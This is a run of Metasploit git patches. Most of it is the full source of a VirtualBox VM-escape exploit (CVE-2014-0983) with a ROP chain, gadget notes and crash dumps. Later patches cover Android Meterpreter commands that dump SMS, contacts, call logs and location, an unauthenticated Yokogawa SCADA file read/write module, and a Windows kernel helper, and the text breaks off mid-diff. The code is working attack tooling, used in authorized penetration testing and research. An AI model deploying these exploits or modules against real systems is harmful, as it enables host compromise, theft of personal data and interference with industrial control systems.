@@ -0,0 +1,459 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = AverageRanking
+
+  DEVICE               = '\\\\.\\VBoxGuest'
+  INVALID_HANDLE_VALUE = 0xFFFFFFFF
+  FILE_SHARE_READ      = 0x00000001
+  FILE_SHARE_WRITE     = 0x00000002
+
+  # VBOX HGCM protocol constants
+  VBOXGUEST_IOCTL_HGCM_CONNECT    = 2269248
+  VBOXGUEST_IOCTL_HGCM_DISCONNECT = 2269252
+  VBOXGUEST_IOCTL_HGCM_CALL       = 2269256
+  CONNECT_MSG_SIZE                = 140
+  DISCONNECT_MSG_SIZE             = 8
+  SET_VERSION_MSG_SIZE            = 40
+  SET_PID_MSG_SIZE                = 28
+  CALL_EA_MSG_SIZE                = 40
+  VERR_WRONG_ORDER                = 0xffffffea
+  SHCRGL_GUEST_FN_SET_PID         = 12
+  SHCRGL_CPARMS_SET_PID           = 1
+  SHCRGL_GUEST_FN_SET_VERSION     = 6
+  SHCRGL_CPARMS_SET_VERSION       = 2
+  SHCRGL_GUEST_FN_INJECT          = 9
+  SHCRGL_CPARMS_INJECT            = 2
+  CR_PROTOCOL_VERSION_MAJOR       = 9
+  CR_PROTOCOL_VERSION_MINOR       = 1
+  VMM_DEV_HGCM_PARM_TYPE_32_BIT   = 1
+  VMM_DEV_HGCM_PARM_TYPE_64_BIT   = 2
+  VMM_DEV_HGCM_PARM_TYPE_LIN_ADDR = 5
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'           => 'VirtualBox 3D Acceleration Virtual Machine Escape',
+      'Description'    => %q{
+        This module exploits a vulnerability in the 3D Acceleration support for VirtualBox. The
+        vulnerability exists in the remote rendering of OpenGL-based 3D graphics. By sending a
+        sequence of specially crafted of rendering messages, a virtual machine can exploit an out
+        of bounds array access to corrupt memory and escape to the host. This module has been
+        tested successfully on Windows 7 SP1 (64 bits) as Host running  Virtual Box 4.3.6.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Francisco Falcon', # Vulnerability Discovery and PoC
+          'Florian Ledoux', # Win 8 64 bits exploitation analysis
+          'juan vazquez' # MSF module
+        ],
+      'Arch'           => ARCH_X86_64,
+      'Platform'       => 'win',
+      'SessionTypes'   => ['meterpreter'],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread'
+        },
+      'Targets'        =>
+        [
+          [ 'VirtualBox 4.3.6 / Windows 7 SP1 / 64 bits (ASLR/DEP bypass)',
+            {
+              :messages => :target_virtualbox_436_win7_64
+            }
+          ]
+        ],
+      'Payload'        =>
+        {
+          'Space'       => 7000,
+          'DisableNops' => true
+        },
+      'References'     =>
+        [
+          ['CVE', '2014-0983'],
+          ['BID', '66133'],
+          ['URL', 'http://www.coresecurity.com/advisories/oracle-virtualbox-3d-acceleration-multiple-memory-corruption-vulnerabilities'],
+          ['URL', 'http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=oracle_virtualbox_3d_acceleration'],
+          ['URL', 'http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php']
+        ],
+      'DisclosureDate' => 'Mar 11 2014',
+      'DefaultTarget'  => 0
+    }))
+
+  end
+
+  def open_device
+    r = session.railgun.kernel32.CreateFileA(DEVICE, "GENERIC_READ | GENERIC_WRITE", FILE_SHARE_READ | FILE_SHARE_WRITE, nil, "OPEN_EXISTING", "FILE_ATTRIBUTE_NORMAL", 0)
+
+    handle = r['return']
+
+    if handle == INVALID_HANDLE_VALUE
+      return nil
+    end
+
+    return handle
+  end
+
+  def send_ioctl(ioctl, msg)
+    result = session.railgun.kernel32.DeviceIoControl(@handle, ioctl, msg, msg.length, msg.length, msg.length, 4, "")
+
+    print_status("#{result}")
+
+    if result["GetLastError"] != 0
+      unless result["ErrorMessage"].blank?
+        vprint_error("#{result["ErrorMessage"]}")
+      end
+      return nil
+    end
+
+    unless result["lpBytesReturned"] && result["lpBytesReturned"] == msg.length
+      unless result["ErrorMessage"].blank?
+        vprint_error("#{result["ErrorMessage"]}")
+      end
+      return nil
+    end
+
+    unless result["lpOutBuffer"] && result["lpOutBuffer"].unpack("V").first == 0
+      unless result["ErrorMessage"].blank?
+        vprint_error("#{result["ErrorMessage"]}")
+      end
+      return nil
+    end
+
+    result
+  end
+
+  def connect
+    msg = "\x00" * CONNECT_MSG_SIZE
+
+    msg[4, 4] = [2].pack("V")
+    msg[8, "VBoxSharedCrOpenGL".length] = "VBoxSharedCrOpenGL"
+
+    result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CONNECT, msg)
+
+    if result.nil?
+      return result
+    end
+
+    client_id = result["lpOutBuffer"][136, 4].unpack("V").first
+
+    client_id
+  end
+
+  def disconnect
+    msg = "\x00" * DISCONNECT_MSG_SIZE
+
+    msg[4, 4] = [@client_id].pack("V")
+
+    result = send_ioctl(VBOXGUEST_IOCTL_HGCM_DISCONNECT, msg)
+
+    result
+  end
+
+  def set_pid(pid)
+    msg = "\x00" * SET_PID_MSG_SIZE
+
+    msg[0, 4]  = [VERR_WRONG_ORDER].pack("V")
+    msg[4, 4]  = [@client_id].pack("V")  # u32ClientID
+    msg[8, 4]  = [SHCRGL_GUEST_FN_SET_PID].pack("V")
+    msg[12, 4] = [SHCRGL_CPARMS_SET_PID].pack("V")
+    msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_64_BIT].pack("V")
+    msg[20, 4] = [pid].pack("V")
+
+    result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg)
+
+    result
+  end
+
+  def set_version
+    info = "\x00" * SET_VERSION_MSG_SIZE
+
+    info[0, 4]  = [VERR_WRONG_ORDER].pack("V")
+    info[4, 4]  = [@client_id].pack("V") # u32ClientID
+    info[8, 4]  = [SHCRGL_GUEST_FN_SET_VERSION].pack("V")
+    info[12, 4] = [SHCRGL_CPARMS_SET_VERSION].pack("V")
+    info[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V")
+    info[20, 4] = [CR_PROTOCOL_VERSION_MAJOR].pack("V")
+    info[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V")
+    info[32, 4] = [CR_PROTOCOL_VERSION_MINOR].pack("V")
+
+    ioctl = session.railgun.kernel32.DeviceIoControl(@handle, VBOXGUEST_IOCTL_HGCM_CALL, info, info.length, info.length, info.length, 4, "")
+
+    if ioctl["GetLastError"] != 0
+      fail_with(Failure::Unknown, "Something wrong while set_version")
+    end
+
+    unless ioctl["lpBytesReturned"] && ioctl["lpBytesReturned"] == SET_VERSION_MSG_SIZE
+      fail_with(Failure::Unknown, "Something wrong while set version")
+    end
+
+    unless ioctl["lpOutBuffer"] && ioctl["lpOutBuffer"].unpack("V").first == 0
+      fail_with(Failure::Unknown, "Something wrong while set version")
+    end
+
+    true
+  end
+
+  def trigger(buff_addr, buff_length)
+    msg = "\x00" * CALL_EA_MSG_SIZE
+
+    msg[4, 4] = [@client_id].pack("V")  # u32ClientID
+    msg[8, 4] = [SHCRGL_GUEST_FN_INJECT].pack("V")
+    msg[12, 4] = [SHCRGL_CPARMS_INJECT].pack("V")
+    msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V")
+    msg[20, 4] = [@client_id].pack("V") # u32ClientID
+    msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_LIN_ADDR].pack("V")
+    msg[32, 4] = [buff_length].pack("V") # size_of(buf)
+    msg[36, 4] = [buff_addr].pack("V") # (buf)
+
+    result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg)
+
+    result
+  end
+
+  def stack_adjustment
+    pivot = "\x65\x8b\x04\x25\x10\x00\x00\x00"  # "mov eax,dword ptr gs:[10h]" # Get Stack Bottom from TEB
+    pivot << "\x89\xc4"                         # mov esp, eax                 # Store stack bottom in esp
+    pivot << "\x81\xC4\x30\xF8\xFF\xFF"         # add esp, -2000               # Plus a little offset...
+
+    pivot
+  end
+
+  def target_virtualbox_436_win7_64(message_id)
+    opcodes = [0xFF, 0xea, 0x02, 0xf7]
+
+    opcodes_hdr = [
+      0x77474c01,    # type CR_MESSAGE_OPCODES
+      0x8899,        # conn_id
+      opcodes.length # numOpcodes
+    ]
+
+    if message_id == 2
+      # Message used to achieve Code execution
+      # See at the end of the module for a better description of the ROP Chain,
+      # or even better, read: http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php
+      # All gadgets from VBoxREM.dll
+      opcodes_data = [0x8, 0x30, 0x331].pack("V*")
+
+      opcodes_data << [0x6a68599a].pack("Q<") # Gadget 2 # pop rdx # xor ecx,dword ptr [rax] # add cl,cl # movzx eax,al # ret
+      opcodes_data << [112].pack("Q<") # RDX
+      opcodes_data << [0x6a70a560].pack("Q<") # Gadget 3 # lea rax,[rsp+8] # ret
+      opcodes_data << [0x6a692b1c].pack("Q<") # Gadget 4 # lea rax,[rdx+rax] # ret
+      opcodes_data << [0x6a6931d6].pack("Q<") # Gadget 5 # add dword ptr [rax],eax # add cl,cl # ret
+      opcodes_data << [0x6a68124e].pack("Q<") # Gadget 6 # pop r12 # ret
+      opcodes_data << [0x6A70E822].pack("Q<") # R12 := ptr to .data in VBoxREM.dll (4th argument lpflOldProtect)
+      opcodes_data << [0x6a70927d].pack("Q<") # Gadget 8 # mov r9,r12 # mov r8d,dword ptr [rsp+8Ch] # mov rdx,qword ptr [rsp+68h] # mov rdx,qword ptr [rsp+68h] # call rbp
+      opcodes_data << Rex::Text.pattern_create(80)
+      opcodes_data << [0].pack("Q<")          # 1st arg (lpAddress) # chain will store stack address here
+      opcodes_data << Rex::Text.pattern_create(104 - 80 - 8)
+      opcodes_data << [0x2000].pack("Q<")     # 2nd arg (dwSize)
+      opcodes_data << Rex::Text.pattern_create(140 - 104 - 8)
+      opcodes_data << [0x40].pack("V")        # 3rd arg (flNewProtect)
+      opcodes_data << Rex::Text.pattern_create(252 - 4 - 140 - 64)
+      opcodes_data << [0x6A70BB20].pack("V")  # ptr to jmp VirtualProtect instr.
+      opcodes_data << "A" * 8
+      opcodes_data << [0x6a70a560].pack("Q<") # Gadget 9
+      opcodes_data << [0x6a6c9d3d].pack("Q<") # Gadget 10
+      opcodes_data << "\xe9\x5b\x02\x00\x00"  # jmp $+608
+      opcodes_data << "A" * (624 - 24 - 5)
+      opcodes_data << [0x6a682a2a].pack("Q<") # Gadget 1 # xchg eax, esp # ret # stack pivot
+      opcodes_data << stack_adjustment
+      opcodes_data << payload.encoded
+      opcodes_data << Rex::Text.pattern_create(8196 - opcodes_data.length)
+    else
+      # Message used to corrupt head_spu
+      # 0x2a9 => offset to head_spu in VBoxSharedCrOpenGL.dll .data
+      # 8196 => On my tests, this data size allows to keep the memory
+      # not reused until the second packet arrives. The second packet,
+      # of course, must have 8196 bytes length too. So this memory is
+      # reused and code execution can be accomplished.
+      opcodes_data = [0x8, 0x30, 0x331, 0x2a9].pack("V*")
+      opcodes_data << "B" * (8196 - opcodes_data.length)
+    end
+
+    msg = opcodes_hdr.pack("V*") + opcodes.pack("C*") + opcodes_data
+
+    msg
+  end
+
+  def send_opcodes_msg(process, message_id)
+    msg = self.send(target[:messages], message_id)
+
+    mem = process.memory.allocate(msg.length + (msg.length % 1024))
+
+    process.memory.write(mem, msg)
+
+    trigger(mem, msg.length)
+  end
+
+  def check
+    handle = open_device
+    if handle.nil?
+      return Exploit::CheckCode::Safe
+    end
+    session.railgun.kernel32.CloseHandle(handle)
+
+    Exploit::CheckCode::Detected
+  end
+
+  def exploit
+    unless self.respond_to?(target[:messages])
+      print_error("Invalid target specified: no messages callback function defined")
+      return
+    end
+
+    print_status("Opening device...")
+    @handle = open_device
+    if @handle.nil?
+      fail_with(Failure::NoTarget, "#{DEVICE} device not found")
+    else
+      print_good("#{DEVICE} found, exploiting...")
+    end
+
+    print_status("Connecting to the service...")
+    @client_id = connect
+    if @client_id.nil?
+      fail_with(Failure::Unknown, "Connect operation failed")
+    end
+
+    print_good("Client ID #{@client_id}")
+
+    print_status("Calling SET_VERSION...")
+    result = set_version
+    if result.nil?
+      fail_with(Failure::Unknown, "Failed to SET_VERSION")
+    end
+
+    this_pid = session.sys.process.getpid
+    print_status("Calling SET_PID...")
+    result = set_pid(this_pid)
+    if result.nil?
+      fail_with(Failure::Unknown, "Failed to SET_PID")
+    end
+
+    this_proc = session.sys.process.open
+    print_status("Sending First 0xEA Opcode Message to control head_spu...")
+    result = send_opcodes_msg(this_proc, 1)
+    if result.nil?
+      fail_with(Failure::Unknown, "Failed to control heap_spu...")
+    end
+
+    print_status("Sending Second 0xEA Opcode Message to execute payload...")
+    @old_timeout = session.response_timeout
+    session.response_timeout = 5
+    begin
+      send_opcodes_msg(this_proc, 2)
+    rescue Rex::TimeoutError
+      vprint_status("Expected timeout in case of successful exploitation")
+    end
+  end
+
+  def cleanup
+    unless @old_timeout.nil?
+      session.response_timeout = @old_timeout
+    end
+
+    if session_created?
+      # Unless we add CoE there is nothing to do
+      return
+    end
+
+    unless @client_id.nil?
+      print_status("Disconnecting from the service...")
+      disconnect
+    end
+
+    unless @handle.nil?
+      print_status("Closing the device...")
+      session.railgun.kernel32.CloseHandle(@handle)
+    end
+  end
+
+end
+
+=begin
+
+* VirtualBox 4.3.6 / Windows 7 SP1 64 bits
+
+Crash after second message:
+
+0:013> dd rax
+00000000`0e99bd44  41306141 61413161 33614132 41346141
+00000000`0e99bd54  61413561 37614136 41386141 62413961
+00000000`0e99bd64  31624130 41326241 62413362 35624134
+00000000`0e99bd74  41366241 62413762 39624138 41306341
+00000000`0e99bd84  63413163 33634132 41346341 63413563
+00000000`0e99bd94  37634136 41386341 64413963 31644130
+00000000`0e99bda4  41326441 64413364 35644134 41366441
+00000000`0e99bdb4  64413764 39644138 41306541 65413165
+0:013> r
+rax=000000000e99bd44 rbx=0000000000000001 rcx=000007fef131e8ba
+rdx=000000006a72fb62 rsi=000000000e5531f0 rdi=0000000000000000
+rip=000007fef12797f8 rsp=0000000004b5f620 rbp=0000000041424344 << already controlled...
+ r8=0000000000000001  r9=00000000000005c0 r10=0000000000000000
+r11=0000000000000246 r12=0000000000000000 r13=00000000ffffffff
+r14=000007fef1f90000 r15=0000000002f6e280
+iopl=0         nv up ei pl nz na po nc
+cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
+VBoxSharedCrOpenGL!crServerAddNewClient+0x208:
+000007fe`f12797f8 ff9070030000    call    qword ptr [rax+370h] ds:00000000`0e99c0b4=7641397541387541
+
+Gadget 1: Stack Pivot # 0x6a682a2a
+
+ xchg    eax,esp    94
+ ret                c3
+
+Gadget 2: Control RDX value # 0x6a68599a
+
+ pop rdx                    5a
+ xor ecx,dword ptr [rax]    33 08
+ add cl,cl                  00 c9
+ movzx eax,al               0f b6 c0
+ ret                        c3
+
+Gadget 3: Store ptr to RSP in RAX # 0x6a70a560
+
+ lea rax,[rsp+8]            48 8d 44 24 08
+ ret                        c3
+
+Gadget 4: Store ptr to RSP + RDX offset (controlled) in RAX # 0x6a692b1c
+
+ lea rax,[rdx+rax]          48 8d 04 02
+ ret                        c3
+
+Gadget 5: Write Stack Address (EAX) to the stack # 0x6a6931d6
+
+ add dword ptr [rax],eax    01 00
+ add cl,cl                  00 c9
+ ret                        c3
+
+Gadget 6: Control R12 # 0x6a68124e
+
+pop r12
+ret
+
+Gadget 7: Recover VirtualProtect arguments from the stack and call it (ebp) # 0x6a70927d
+
+ mov r9,r12                   4d 89 e1
+ mov r8d,dword ptr [rsp+8Ch]  44 8b 84 24 8c 00 00 00
+ mov rdx,qword ptr [rsp+68h]  48 8b 54 24 68
+ mov rcx,qword ptr [rsp+50h]  48 8b 4c 24 50
+ call rbp                     ff d5
+
+Gadget 8: After VirtualProtect, get pointer to the shellcode in the # 0x6a70a560
+
+ lea rax, [rsp+8]   48 8d 44 24 08
+ ret                c3
+
+ Gadget 9: Push the pointer and provide control to shellcode # 0x6a6c9d3d
+
+ push rax   50
+ adc cl,ch  10 e9
+ ret        c3
+
+=end

From d959affd6e25c0282ae017de75664f2c34858368 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Sat, 9 Aug 2014 01:58:42 -0500
Subject: [PATCH 266/321] Delete debug message

---
 modules/exploits/windows/local/virtual_box_opengl_escape.rb | 2 --
 1 file changed, 2 deletions(-)

diff --git a/modules/exploits/windows/local/virtual_box_opengl_escape.rb b/modules/exploits/windows/local/virtual_box_opengl_escape.rb
index d857396228..71e86a63f9 100644
--- a/modules/exploits/windows/local/virtual_box_opengl_escape.rb
+++ b/modules/exploits/windows/local/virtual_box_opengl_escape.rb
@@ -102,8 +102,6 @@ class Metasploit3 < Msf::Exploit::Local
   def send_ioctl(ioctl, msg)
     result = session.railgun.kernel32.DeviceIoControl(@handle, ioctl, msg, msg.length, msg.length, msg.length, 4, "")
 
-    print_status("#{result}")
-
     if result["GetLastError"] != 0
       unless result["ErrorMessage"].blank?
         vprint_error("#{result["ErrorMessage"]}")

From 486b5523eed1d6272f4ad596101ee60842b16fe3 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Sat, 9 Aug 2014 02:17:07 -0500
Subject: [PATCH 267/321] Refactor set_version

---
 .../local/virtual_box_opengl_escape.rb        | 34 ++++++-------------
 1 file changed, 11 insertions(+), 23 deletions(-)

diff --git a/modules/exploits/windows/local/virtual_box_opengl_escape.rb b/modules/exploits/windows/local/virtual_box_opengl_escape.rb
index 71e86a63f9..3714a27e83 100644
--- a/modules/exploits/windows/local/virtual_box_opengl_escape.rb
+++ b/modules/exploits/windows/local/virtual_box_opengl_escape.rb
@@ -169,32 +169,20 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def set_version
-    info = "\x00" * SET_VERSION_MSG_SIZE
+    msg = "\x00" * SET_VERSION_MSG_SIZE
 
-    info[0, 4]  = [VERR_WRONG_ORDER].pack("V")
-    info[4, 4]  = [@client_id].pack("V") # u32ClientID
-    info[8, 4]  = [SHCRGL_GUEST_FN_SET_VERSION].pack("V")
-    info[12, 4] = [SHCRGL_CPARMS_SET_VERSION].pack("V")
-    info[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V")
-    info[20, 4] = [CR_PROTOCOL_VERSION_MAJOR].pack("V")
-    info[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V")
-    info[32, 4] = [CR_PROTOCOL_VERSION_MINOR].pack("V")
+    msg[0, 4]  = [VERR_WRONG_ORDER].pack("V")
+    msg[4, 4]  = [@client_id].pack("V") # u32ClientID
+    msg[8, 4]  = [SHCRGL_GUEST_FN_SET_VERSION].pack("V")
+    msg[12, 4] = [SHCRGL_CPARMS_SET_VERSION].pack("V")
+    msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V")
+    msg[20, 4] = [CR_PROTOCOL_VERSION_MAJOR].pack("V")
+    msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V")
+    msg[32, 4] = [CR_PROTOCOL_VERSION_MINOR].pack("V")
 
-    ioctl = session.railgun.kernel32.DeviceIoControl(@handle, VBOXGUEST_IOCTL_HGCM_CALL, info, info.length, info.length, info.length, 4, "")
+    result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg)
 
-    if ioctl["GetLastError"] != 0
-      fail_with(Failure::Unknown, "Something wrong while set_version")
-    end
-
-    unless ioctl["lpBytesReturned"] && ioctl["lpBytesReturned"] == SET_VERSION_MSG_SIZE
-      fail_with(Failure::Unknown, "Something wrong while set version")
-    end
-
-    unless ioctl["lpOutBuffer"] && ioctl["lpOutBuffer"].unpack("V").first == 0
-      fail_with(Failure::Unknown, "Something wrong while set version")
-    end
-
-    true
+    result
   end
 
   def trigger(buff_addr, buff_length)

From dbaa377aa1c87acc32cf101d30fa0207efc936f2 Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Sat, 9 Aug 2014 13:02:47 -0500
Subject: [PATCH 268/321] Final-round of code tweaks. All commands working
 well.

---
 lib/msf/base/sessions/meterpreter_android.rb  |  8 ++---
 lib/msf/base/sessions/meterpreter_options.rb  |  2 +-
 .../ui/console/command_dispatcher/android.rb  | 30 ++++++++-----------
 3 files changed, 15 insertions(+), 25 deletions(-)

diff --git a/lib/msf/base/sessions/meterpreter_android.rb b/lib/msf/base/sessions/meterpreter_android.rb
index 6727bfd81b..f3417ae8c7 100644
--- a/lib/msf/base/sessions/meterpreter_android.rb
+++ b/lib/msf/base/sessions/meterpreter_android.rb
@@ -14,22 +14,18 @@ module Sessions
 ###
 class Meterpreter_Java_Android < Msf::Sessions::Meterpreter_Java_Java
 
-  def supports_ssl?
-    false
-  end
-  def supports_zlib?
-    false
-  end
   def initialize(rstream, opts={})
     super
     self.platform = 'java/android'
   end
+
   def load_android
     original = console.disable_output  
     console.disable_output = true
     console.run_single('load android')
     console.disable_output = original
   end
+
 end
 
 end
diff --git a/lib/msf/base/sessions/meterpreter_options.rb b/lib/msf/base/sessions/meterpreter_options.rb
index 2a02ad9aa7..f9d60d30b8 100644
--- a/lib/msf/base/sessions/meterpreter_options.rb
+++ b/lib/msf/base/sessions/meterpreter_options.rb
@@ -60,7 +60,7 @@ module MeterpreterOptions
     end
 
     if session.platform =~ /android/i
-      if (datastore['AutoLoadAndroid'])
+      if datastore['AutoLoadAndroid']
         session.load_android
       end
     end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
index c540a2b01f..a31638bc61 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
@@ -15,10 +15,6 @@ module Ui
 class Console::CommandDispatcher::Android
   include Console::CommandDispatcher
   include Msf::Auxiliary::Report
- 
-  def framework
-    client.framework
-  end
 
   #
   # List of supported commands.
@@ -35,18 +31,17 @@ class Console::CommandDispatcher::Android
 
     reqs = {
       'dump_sms'        => [ 'dump_sms' ],
-      'dump_contacts'   => [ 'dump_contacts'],
-      'geolocate'       => [ 'geolocate'],
-      'dump_calllog'    => [ 'dump_calllog'],
-      'check_root'      => [ 'check_root'],
+      'dump_contacts'   => [ 'dump_contacts' ],
+      'geolocate'       => [ 'geolocate' ],
+      'dump_calllog'    => [ 'dump_calllog' ],
+      'check_root'      => [ 'check_root' ],
       'device_shutdown' => [ 'device_shutdown']
     }
 
+    # Ensure any requirements of the command are met
     all.delete_if do |cmd, desc|
       reqs[cmd].any? { |req| not client.commands.include?(req) }
     end
-
-    all
   end
 
   def cmd_device_shutdown(*args)
@@ -55,7 +50,7 @@ class Console::CommandDispatcher::Android
     device_shutdown_opts = Rex::Parser::Arguments.new(
       '-h' => [ false, 'Help Banner' ],
       '-t' => [ false, 'Shutdown after n seconds']
-  )
+    )
 
     device_shutdown_opts.parse(args) { | opt, idx, val |
       case opt
@@ -98,7 +93,7 @@ class Console::CommandDispatcher::Android
       end
     }
 
-    smsList = Array.new
+    smsList = []
     smsList = client.android.dump_sms
 
     if smsList.count > 0
@@ -106,7 +101,7 @@ class Console::CommandDispatcher::Android
       begin
         info = client.sys.config.sysinfo
 
-        data = String::new
+        data = ""
         data << "\n=====================\n"
         data << "[+] Sms messages dump\n"
         data << "=====================\n\n"
@@ -191,7 +186,7 @@ class Console::CommandDispatcher::Android
       end
     }
 
-    contactList = Array.new
+    contactList = []
     contactList = client.android.dump_contacts
 
     if contactList.count > 0
@@ -199,7 +194,7 @@ class Console::CommandDispatcher::Android
       begin
         info = client.sys.config.sysinfo
 
-        data = String::new
+        data = ""
         data << "\n======================\n"
         data << "[+] Contacts list dump\n"
         data << "======================\n\n"
@@ -273,7 +268,6 @@ class Console::CommandDispatcher::Android
     print_line("\tLongitude: #{geo[0]['long']}\n")
     print_line("To get the address: https://maps.googleapis.com/maps/api/geocode/json?latlng=#{geo[0]['lat'].to_f},#{geo[0]['long'].to_f}&sensor=true\n")
 
-
     if generate_map
       link = "https://maps.google.com/maps?q=#{geo[0]['lat'].to_f},#{geo[0]['long'].to_f}"
       print_status("Generated map on google-maps:")
@@ -312,7 +306,7 @@ class Console::CommandDispatcher::Android
       begin
         info = client.sys.config.sysinfo
 
-        data = String::new
+        data = ""
         data << "\n=================\n"
         data << "[+] Call log dump\n"
         data << "=================\n\n"
@@ -368,7 +362,7 @@ class Console::CommandDispatcher::Android
     is_rooted = client.android.check_root
 
     if is_rooted
-      print_status('Device is rooted')
+      print_good('Device is rooted')
     elsif
       print_status('Device is not rooted')
     end

From 08bb815bd8769cff755880175069f2bc1fbdf972 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Sat, 9 Aug 2014 13:30:10 -0500
Subject: [PATCH 269/321] Add Yokogawa unauth admin module

---
 .../admin/scada/yokogawa_bkbcopyd_client.rb   | 132 ++++++++++++++++++
 1 file changed, 132 insertions(+)
 create mode 100644 modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb

diff --git a/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb b/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb
new file mode 100644
index 0000000000..f7ed07c56a
--- /dev/null
+++ b/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb
@@ -0,0 +1,132 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::TcpServer
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Yokogawa BKBCopyD.exe Client',
+      'Description'    => %q{
+        This module allows an unauthenticated user to interact with the Yokogawa
+        CENTUM CS3000 BKBCopyD.exe service through the PMODE, RETR and STOR
+        operations.
+      },
+      'Author'         =>
+        [ 'Unknown' ],
+      'References'     =>
+        [
+          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/08/09/r7-2014-10-disclosure-yokogawa-centum-cs3000-bkbcopydexe-file-system-access']
+        ],
+      'Actions'     =>
+        [
+          ['PMODE', { 'Description' => 'Leak the current database' }],
+          ['RETR',  { 'Description' => 'Retrieve remote file' }],
+          ['STOR',  { 'Description' => 'Store remote file' }]
+        ],
+      'DisclosureDate' => 'Aug 9 2014',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        Opt::RPORT(20111),
+        OptString.new('RPATH', [ false, 'The Remote Path (required to RETR and STOR)', "" ]),
+        OptPath.new('LPATH', [ false, 'The Local Path (required to STOR)' ])
+      ], self.class)
+  end
+
+  def srvport
+    @srvport
+  end
+
+  def run
+    exploit
+  end
+
+  def exploit
+    @srvport = rand(1024..65535)
+    print_status("#{@srvport}")
+    # We make the client connection before giving control to the TCP Server
+    # in order to release the src port, so the server can start correctly
+
+    case action.name
+    when 'PMODE'
+      print_status("Sending PMODE packet...")
+      data = "PMODE MR_DBPATH\n"
+      res = send_pkt(data)
+      if res and res =~ /^210/
+        print_good("Success: #{res}")
+      else
+        print_error("Failed...")
+      end
+      return
+    when 'RETR'
+      data = "RETR #{datastore['RPATH']}\n"
+      print_status("Sending RETR packet...")
+      res = send_pkt(data)
+      return unless res and res =~ /^150/
+    when 'STOR'
+      data = "STOR #{datastore['RPATH']}\n"
+      print_status("Sending STOR packet...")
+      res = send_pkt(data)
+      return unless res and res =~ /^150/
+    else
+      print_error("Incorrect action")
+      return
+    end
+
+    super # TCPServer :)
+  end
+
+  def send_pkt(data)
+    connect(true, {'CPORT' => @srvport})
+    sock.put(data)
+    data = sock.get_once
+    disconnect
+
+    return data
+  end
+
+  def valid_response?(data)
+    return false unless !!data
+    return false unless data =~ /500  'yyparse error': command not understood/
+    return true
+  end
+
+  def on_client_connect(c)
+    if action.name == 'STOR'
+      contents = ""
+      File.new(datastore['LPATH'], "rb") { |f| contents = f.read }
+      print_status("#{c.peerhost} - Sending data...")
+      c.put(contents)
+      self.service.close
+      self.service.stop
+    end
+  end
+
+  def on_client_data(c)
+    print_status("#{c.peerhost} - Getting data...")
+    data = c.get_once
+    return unless data
+    if @store_path.blank?
+      @store_path = store_loot("yokogawa.cs3000.file", "application/octet-stream", rhost, data, datastore['PATH'])
+      print_good("#{@store_path} saved!")
+    else
+      File.open(@store_path, "ab") { |f| f.write(data) }
+      print_good("More data on #{@store_path}")
+    end
+  end
+
+  def on_client_close(c)
+    stop_service
+  end
+
+end
+

From b277f588fb5582f5e396a290f0d87febe1088c5e Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sun, 10 Aug 2014 21:52:12 +0100
Subject: [PATCH 270/321] Use railgun helper functions

---
 lib/msf/core/exploit/local/windows_kernel.rb | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/lib/msf/core/exploit/local/windows_kernel.rb b/lib/msf/core/exploit/local/windows_kernel.rb
index 5917334220..5346946254 100644
--- a/lib/msf/core/exploit/local/windows_kernel.rb
+++ b/lib/msf/core/exploit/local/windows_kernel.rb
@@ -48,23 +48,23 @@ module Exploit::Local::WindowsKernel
   # @return [nil] If the name specified could not be found.
   #
   def find_sys_base(drvname)
-    if sysinfo['Architecture'] =~ /(x86|wow64)/i
-      ptr_size = 4
+    if session.railgun.util.pointer_size == 8
+      ptr = '<Q'
     else
-      ptr_size = 8
